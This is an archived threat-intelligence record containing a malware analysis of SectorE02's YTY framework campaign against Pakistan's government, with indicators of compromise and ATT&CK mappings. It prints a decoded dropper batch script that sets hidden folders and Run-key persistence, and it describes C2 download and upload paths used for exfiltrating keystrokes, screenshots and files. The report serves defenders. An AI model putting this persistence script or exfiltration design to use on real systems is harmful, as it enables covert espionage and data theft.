{
	"id": "ecce331b-4f05-4880-a1cf-0bc6678eff4a",
	"created_at": "2026-04-06T00:21:10.742576Z",
	"updated_at": "2026-04-10T13:12:00.463486Z",
	"deleted_at": null,
	"sha1_hash": "559510923d4fa0e1f0d3ec6a210a49d09903c3e8",
	"title": "SectorE02 Updates YTY Framework in New Targeted Campaign Against Pakistan Government – Red Alert",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1613443,
	"plain_text": "SectorE02 Updates YTY Framework in New Targeted Campaign Against Pakistan Government – Red Alert\r\nArchived: 2026-04-05 17:01:18 UTC\r\nOverview\r\nFrom March to July this year, the ThreatRecon team noticed a spear phishing campaign by the SectorE02 group going on against the Government of Pakistan and organizations there related to defense and intelligence. Spear phishing emails are sent to their victims via Excel XLS files, which ask the victims to enable macros that end up executing the downloader. Malicious document lures they have employed in recent times include a document purporting to be for registration for the Pakistan Air Force.\r\nhttps://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/\r\nPage 1 of 13\r\nSecurity advisory by the Pakistan government regarding targeted attacks\r\nSectorE02 is a threat actor which has targeted countries in South Asia, especially Pakistan, since at least 2012. Their arsenal includes a modular framework researchers have dubbed the “YTY Framework”, which has a Windows and a mobile version. Use of this framework allows the SectorE02 group to constantly modify and even remake individual plugins of the framework, and to pick and choose which plugins – if any – are sent to their victims. This modularity also allows the SectorE02 group to maintain low detections by antivirus engines, because each module only does something simple and will not even work without certain previously dropped files. In this post, we will describe their lure document, first stage downloader, file plugin, screenshot plugin, keylogger plugin, and exfiltration uploader plugin.\r\nExcel Spear Phishing\r\nThe Excel files used by them had names such as Credit_Score.xls, Advance_Salary.xls, CSD_Schemes_2019.xls, and Agrani_Bank.xls. In some instances, the file masqueraded as an Excel calculator from the National Bank of Pakistan.\r\nLure document 1\r\nIn later stages of the campaign, however, the group appeared to switch to using a MsgBox to show an error saying “This file is corrupted”.\r\nLure document 2\r\nBehind the scenes, the Excel macro would retrieve encoded data stored in itself; the encoding here is just a simple decimal encoding with a comma (or exclamation mark) as a separator. The same encoding is used for the dropped executable, although more often one entire file is encoded as a zip archive containing two files – a batch script and an executable – which is then unzipped and executed.\r\nAll four files shown here are illustrative copies of the original “.txt”, “.pdf”, and “.inp” files, which are actually executable binaries\r\nExample Encoded Batch File in XLS Doc using Comma Separator\r\n101,99,104,111,32,111,102,102,13,10,114,100,32,47,115,32,47,113,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,80\r\nThe dropped batch scripts follow the same basic format: creating folders with the hidden, system, and archive attributes, dropping the batch and executable files there, and setting persistence through either scheduled tasks or the autorun registry key. A text file containing the %COMPUTERNAME% variable and random digits will also be saved as “win.txt”, and this file is required by the executable downloader.\r\nA dump showing the scheduled task created by the batch script\r\nThe batch file that is dropped is used for three main purposes: 1) to set up the first folder, which is used to store the text file containing the computer name, 2) to set up what we call the “common exfiltration folder”, which each individual plugin uses for different purposes, and 3) to set up persistence via scheduled task or registry run keys.\r\nExample Decoded Batch File in XLS Doc\r\n/echo off\r\nrd /s /q %USERPROFILE%\\Printers\\Neighbourhood\\Spools\r\nrd /s /q %USERPROFILE%\\Print\\Network\\Server\r\nrd /s /q %USERPROFILE%\\DriveData\\Files\r\nrd /s /q %USERPROFILE%\\DriveData\\Wins\r\nmd %USERPROFILE%\\Printers\\Neighbourhood\\Spools\r\nmd %USERPROFILE%\\DriveData\\Files\r\nmd %USERPROFILE%\\DriveData\\Wins\r\nmd %USERPROFILE%\\Print\\Network\\Server\r\nattrib +a +h +s “%USERPROFILE%\\DriveData”\r\nattrib +a +h +s “%USERPROFILE%\\Printers”\r\nattrib +a +h +s “%USERPROFILE%\\Print”\r\nSET /A %COMPUTERNAME%\r\nSET /A RAND=%RANDOM% 10000 + 1\r\necho %COMPUTERNAME%-%RAND% \u003e\u003e %USERPROFILE%\\DriveData\\Files\\win.txt\r\necho %COMPUTERNAME%-%RAND% \u003e\u003e %USERPROFILE%\\DriveData\\Wins\\win.txt\r\nreg delete “HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run” /v Files /f\r\nreg delete “HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run” /v Wins /f\r\nreg delete “HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run” /v BigSyn /f\r\nreg delete “HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run” /v Dataupdate /f\r\nreg add “HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run” /v Files /t REG_SZ /d %USERPROFILE%\\DriveData\\Wins\\\r\nreg add “HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run” /v Wins /t REG_SZ /d %USERPROFILE%\\DriveData\\Files\\\r\nreg add “HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run” /v BigSyn /t REG_SZ /d %USERPROFILE%\\DriveData\\File\r\nreg add “HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run” /v BigUpdate /t REG_SZ /d %USERPROFILE%\\DriveData\\F\r\nreg add “HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run” /v Dataupdate /t REG_SZ /d %USERPROFILE%\\DriveData\\\r\nmove %userprofile%\\AppData\\juchek.ttp %userprofile%\\DriveData\\Wins\r\nren %userprofile%\\DriveData\\Wins\\juchek.ttp juchek.exe\r\ndel %0\r\nDownloader\r\n(b874a158f019dc082a0069eb3f7e169fbec2b4f05b123eed62d81776a7ddb384)\r\nLooking at the latest downloader executable, which masquerades its filename as an InPage word document (bgfRdstr54sf.inp), it starts off by using CreateEventA as a mutex with the value “ab567” and only works if the file %USERPROFILE%\\DriveData\\Files\\win.txt exists. It polls the C2 server every 100 or so seconds. It uses the fixed user agent string “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0”, and performs an HTTPS GET against servicejobs[.]life/orderme/[computername]-[random].\r\nThis is a change from their previous URL structure, “/orderme”, which contained the file(s) to be downloaded, and this allows them to cherry pick their victims – unless the SectorE02 operator specifically places the next stage malware in the server directory for a particular victim, that victim will only ever be infected with the downloader.\r\nThe downloader malware accepts three commands from the server, selected by the response header “Content-Type: application”, “Content-Type: cmdline”, or “Content-Type: batcmd”, which are used for saving files to disk or executing files/commands on the system. This is how the next stage downloader or plugins can be executed on the victim system.\r\nScreenshot Plugin\r\n(f10f41bd38832596d4c449f81b9eb4129361aa4e4ebd4a8e8d2d8bf388934ca5)\r\nThis executable plugin takes a screenshot every two minutes using the Windows API to draw the raw screen bitmap to the common exfiltration folder, %USERPROFILE%\\Print\\Network\\Server\\. It then converts this raw bitmap to a JPG in a new file and deletes the raw bitmap file.\r\nCode in the screenshot plugin creating the raw bitmap\r\nThe screenshot files are named in the format “tm_hour-tm_min-tm_sec-tm_year-tm_mday-tm_mon” [1].\r\nScreenshot JPGs created by the screenshot plugin\r\nLike some of the other YTY components, the obfuscated strings can be deobfuscated by running both the base64 and reverse string algorithm multiple (in this case, three) times.\r\nThe strings can be deobfuscated by running both the base64 and reverse algorithm three times\r\nFile Listing Plugin\r\n(d71a1d993e9515ec69a32f913c2a18f14cdb52ef06e4011c8622b5945440c1aa)\r\nThis executable plugin recursively searches through the “C:”, “D:”, “E:”, “F:”, “G:”, and “H:” drives, looking for the interesting file extensions shown below. Several default folders are avoided by the malware.\r\nNote that the “.inp” extension is for “Urdu InPage”, a word processing program which supports languages such as Urdu, the national language of Pakistan. The extensions that earlier versions of this plugin did not look for, but the 2019 version does, are “.odt” and “.eml”, and “.rft” is just a spelling mistake they made of “.rtf”.\r\nThe latest version of the plugin looks for files containing any of 14 different file extensions\r\nIt only looks for files modified later than the year 2017 and saves the text data of all matching files found in %APPDATA%\\DriveData\\Files\\clist.log using the format “File Path|Size WriteTimestamp l_flag”.\r\nFile path and names for exfiltration are saved to a clist.log file\r\nCopies of these matching files are also saved to the common exfiltration folder, %USERPROFILE%\\Print\\Network\\Server\\. The copied files are individually saved with the file name being the full file path to the copied file, with slashes becoming underscores.\r\nExact copies of files the plugin is looking for are saved to the common exfiltration folder\r\nKeylogger Plugin\r\n(f331f67baa2650c426daae9dee6066029beb8b17253f26ad9ebbd3a64b2b6a37)\r\nThis plugin starts off by using CreateEventA as a mutex with the value “k4351”. It saves user keystrokes, along with the title of the window they were typed in, to the common exfiltration folder, %USERPROFILE%\\Print\\Network\\Server\\. The file is saved as “[username]_YYYY_MM_DD(HH_mm_ss).txt”.\r\nExample of input captured by the keylogger plugin\r\nUploader Plugin\r\n(d4e587b16fbc486a62cc33febd5438be3a9690afc1650af702ed42d00ebfd39e)\r\nThis plugin starts off by using CreateEventA as a mutex with the value “MyEvent3525” and only works if the file %USERPROFILE%\\DriveData\\Files\\win.txt exists. While the other plugins dump their files into the common exfiltration folder, the uploader plugin takes the files from that folder and uploads them to the C2 server, which is the same server as the downloader C2 server. The uploaded files are deleted immediately after.\r\nThe uploader performs an HTTP POST of the file to /upload/[computername] using HTTP forms with the same hard coded user-agent as their downloader malware, “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0”.\r\nData sent to the C2 server through HTTPS for exfiltration\r\nSummary\r\nWhile the use of a modular framework is not a new concept, we see that the SectorE02 group’s continuous remaking of their YTY framework plugins which serve the same purpose allows them to keep detections by security tools at a minimum. Based on their campaigns and the plugins we have seen, we believe they may be recreating each plugin on a per-campaign basis, meaning that each attack campaign might use new binaries coded from scratch that are hardly detected by security tools. At the same time, their newfound cautiousness in protecting their binaries from being downloaded and their limited targeting mean that the hardest part of detecting and responding to the SectorE02 group may be finding their related binaries in the first place.\r\nIndicators of Compromise (IoCs)\r\nMalicious Excel Files (SHA-256)\r\n1f64ab4db42ad68b4b99120ef6e9d1409cf606d31d932c0d306bb11c8ddcb2b4\r\n5a70d423fb336448fc7a71fbc3c7a4f0397bc7fa1ec32f7cc42824a432051c33\r\n95ea070bbfca04fff58a7092d61527aad0474914ffd2501d96991faad1388c7a\r\nfdcf3873df6f83336539c4997ce69fce459737c6d655f1972422f861437858a9\r\n6d0a3c4b2414c59be1190710c09330f4dd07e7badc4194e592799783f1cfd055\r\n7703c3385894dd3468c468745c747bf5c75f37a9b1fcaf2a1d0f291ecb7abce6\r\naa1c8adc4b7d352e487842b1d3017f627230ff1057350aaca1ffeb4d6abae16a\r\na06a5b1d63ca67da90ba6cd9cbc00d6872707a1b49d44de26d6eb5ce7dd7d545\r\ncc2c2694d0284153605a98c0e7493fb90aff0d78e7f03e37c80fb505fbf3f93f\r\n42775c20aa5b73b2eaecb5b107ce59d105f978660e6e43f53f804733ce3f7cbe\r\nf0c85a1c9cf80ad424acebbe7af54176d0cb778a639da2f2f59828af5bb79842\r\nDropped Batch Scripts (SHA-256)\r\n92b12010772166647f510ad91731e931d58bc077bfc9f9d39adc678cc00fb65d\r\n1b46735d6b6aebefd5809274de1aaa56b5fac314b33c2fa51b001e07b4f7e4d7\r\n57a9a17baaf61de5cffa8b2e2ec340a179e7e1cd70e046cbd832655c44bc7c1d\r\ncd03ed9e4f3257836e11016294c8701baa12414b59f221e556cbed16a946b205\r\nce1df70e96b4780329d393ff7a37513aec222030e80606ee3ef99b306951d74d\r\n9169dab8579d49253f72439f7572e0aabeb685c5ca63bf91fff81502764e79bb\r\nDropped YTY Downloaders (SHA-256)\r\n5acfd1b49ae86ef66b94a3e0209a2d2a3592c31b57ccbaa4bb9540fcf3403574\r\n08b11f246e2ebcfc049f198c055fc855e0af1f8499ba18791e3232efa913b01a\r\n62dfec7fe0025e8863c2252abb4ec1abdb4b916b76972910c6a47728bfb648a7\r\n13f27543d03fd4bee3267bdc37300e578994f55edabc031de936ff476482ceb4\r\nb874a158f019dc082a0069eb3f7e169fbec2b4f05b123eed62d81776a7ddb384\r\ne726c07f3422aaee45187bae9edb1772146ccac50315264b86820db77b42b31c\r\nYTY File Plugin (SHA-256)\r\n8fff7f07ebf0a1e0a4eabdcf57744739f39de643d831c36416b663bd243590e1\r\nd71a1d993e9515ec69a32f913c2a18f14cdb52ef06e4011c8622b5945440c1aa\r\nYTY Screenshot Plugin (SHA-256)\r\nf10f41bd38832596d4c449f81b9eb4129361aa4e4ebd4a8e8d2d8bf388934ca5\r\nYTY Keylogger Plugin (SHA-256)\r\nf331f67baa2650c426daae9dee6066029beb8b17253f26ad9ebbd3a64b2b6a37\r\nYTY File Exfiltration Uploader Plugin (SHA-256)\r\nd4e587b16fbc486a62cc33febd5438be3a9690afc1650af702ed42d00ebfd39e\r\nIP Addresses\r\n179[.]43[.]170[.]155\r\n5[.]135[.]199[.]26\r\nDomains\r\ndata-backup[.]online\r\nservicejobs[.]life\r\nMITRE ATT\u0026CK Techniques\r\nThe following is a list of MITRE ATT\u0026CK Techniques we have observed based on our analysis of this malware.\r\nInitial Access\r\nT1193 Spearphishing Attachment\r\nExecution\r\nT1059 Command-Line Interface\r\nT1053 Scheduled Task\r\nT1064 Scripting\r\nT1204 User Execution\r\nPersistence\r\nT1158 Hidden Files and Directories\r\nT1060 Registry Run Keys / Startup Folder\r\nT1053 Scheduled Task\r\nDefense Evasion\r\nT1140 Deobfuscate/Decode Files or Information\r\nT1107 File Deletion\r\nT1158 Hidden Files and Directories\r\nT1066 Indicator Removal from Tools\r\nT1112 Modify Registry\r\nT1027 Obfuscated Files or Information\r\nT1064 Scripting\r\nCredential Access\r\nT1056 Input Capture\r\nDiscovery\r\nT1010 Application Window Discovery\r\nT1083 File and Directory Discovery\r\nT1082 System Information Discovery\r\nT1497 Virtualization/Sandbox Evasion\r\nCollection\r\nT1119 Automated Collection\r\nT1005 Data from Local System\r\nT1039 Data from Network Shared Drive\r\nT1025 Data from Removable Media\r\nT1074 Data Staged\r\nT1114 Email Collection\r\nT1056 Input Capture\r\nT1113 Screen Capture\r\nCommand and Control\r\nT1043 Commonly Used Port\r\nT1071 Standard Application Layer Protocol\r\nExfiltration\r\nT1020 Automated Exfiltration\r\nT1041 Exfiltration Over Command and Control Channel\r\nReferences\r\nSource: https://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/"
	],
	"report_names": [
		"sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government"
	],
	"threat_actors": [
		{
			"id": "2ac63ef4-a7b8-4a30-96ad-b30ccb2073fc",
			"created_at": "2022-10-25T16:07:23.546262Z",
			"updated_at": "2026-04-10T02:00:04.651083Z",
			"deleted_at": null,
			"main_name": "Donot Team",
			"aliases": [
				"APT-C-35",
				"Mint Tempest",
				"Origami Elephant",
				"SectorE02"
			],
			"source_name": "ETDA:Donot Team",
			"tools": [
				"BackConfig",
				"EHDevel",
				"Jaca",
				"yty"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "cfdd350b-de30-4d29-bbee-28159f26c8c2",
			"created_at": "2023-01-06T13:46:38.433736Z",
			"updated_at": "2026-04-10T02:00:02.972971Z",
			"deleted_at": null,
			"main_name": "VICEROY TIGER",
			"aliases": [
				"OPERATION HANGOVER",
				"Donot Team",
				"APT-C-35",
				"SectorE02",
				"Orange Kala"
			],
			"source_name": "MISPGALAXY:VICEROY TIGER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434870,
	"ts_updated_at": 1775826720,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/559510923d4fa0e1f0d3ec6a210a49d09903c3e8.pdf",
		"text": "https://archive.orkl.eu/559510923d4fa0e1f0d3ec6a210a49d09903c3e8.txt",
		"img": "https://archive.orkl.eu/559510923d4fa0e1f0d3ec6a210a49d09903c3e8.jpg"
	}
}